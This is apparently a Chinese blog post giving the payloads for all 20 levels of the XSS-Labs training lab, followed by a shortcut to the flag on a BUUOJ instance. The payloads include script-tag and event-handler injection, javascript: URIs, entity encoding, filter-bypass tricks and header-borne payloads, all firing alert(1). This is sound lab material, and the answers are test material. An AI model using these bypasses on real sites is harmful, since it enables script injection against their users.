XSS-Lab

1.关于20关的payload合集。

复制代码
<script>alert(1)</script>
"><script>alert(1)</script>
'onclick='alert(1)
" onclick="alert(1)
"><a href="javascript:alert(1)">
"><a HrEf="javascript:alert(1)">
"><scscriptript>alert(1)</sscriptcript>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
?t_sort=" type="text" onclick="alert('xss')
" type="text" onmousemove="alert(1)    #将payload写到referer里
" type="text" onmousemove="alert(1) 	 #将payload写User-Agent头
" type="text" onmousemove="alert(1)    #将payload写cookie头
payload是一张图片马
http://127.0.0.1/xss-labs-master/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0dsrc=1%0donerror=alert(1)>
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=aaa onmousemove='alert(1)'
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=aaa onmousemove='alert(1)'
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)

10.修改参数

修改

点击

20.如果不想走流程,可直接跳过前往20关获得flag

复制代码
http://a2f864e8-582b-4d62-a066-a1fd17700dd2.node5.buuoj.cn:81/level20.php
查看源码获得
flag{ad270776-5056-479e-8119-fcf63393d388}

右键查看源码,获得flag{ad270776-5056-479e-8119-fcf63393d388}

相关推荐
Yvonne爱编码7 分钟前
HTML-3.3 表格布局(学校官网简易布局实例)
前端·html·github·html5·hbuilder
K龙25 分钟前
私有资产测绘&安全流水线Shovel
运维·安全·开发·其它
weixin_5498083630 分钟前
如何使用易路iBuilder智能体平台快速安全深入实现AI HR【实用帖】
人工智能·安全
jllllyuz1 小时前
matlab实现蚁群算法解决公交车路径规划问题
服务器·前端·数据库
小屁孩大帅-杨一凡2 小时前
一个简单点的js的h5页面实现地铁快跑的小游戏
开发语言·前端·javascript·css·html
读心悦2 小时前
CSS 布局系统深度解析:从传统到现代的布局方案
前端·css
椒盐螺丝钉2 小时前
CSS盒子模型:Padding与Margin的适用场景与注意事项
前端·css
网硕互联的小客服2 小时前
如何安全配置好CDN用于防止DDoS与Web攻击 ?
安全·ddos
萧鼎3 小时前
构建全栈 Web 应用的新选择:NextPy 技术详解与实战指南
前端
这个一个非常哈3 小时前
VUE篇之自定义组件使用v-model
前端·javascript·vue.js